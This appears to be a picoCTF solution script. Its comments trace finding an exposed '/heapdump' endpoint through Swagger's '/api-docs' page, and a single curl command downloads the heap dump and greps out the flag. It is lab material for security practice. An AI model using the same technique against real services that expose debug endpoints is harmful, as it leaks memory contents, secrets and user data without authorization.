9 lines
320 B
Bash
Executable File
9 lines
320 B
Bash
Executable File
#!/usr/bin/env bash
|
|
|
|
# NOTE:
|
|
# - main page had a post about swagger
|
|
# - https://www.npmjs.com/package/swagger-ui-express suggests the '/api-docs' path
|
|
# - http://verbal-sleep.picoctf.net:53966/api-docs reveals /heapdump
|
|
|
|
curl -s "http://verbal-sleep.picoctf.net:53966/heapdump" | grep --only-matching -E 'picoCTF\{.*\}'
|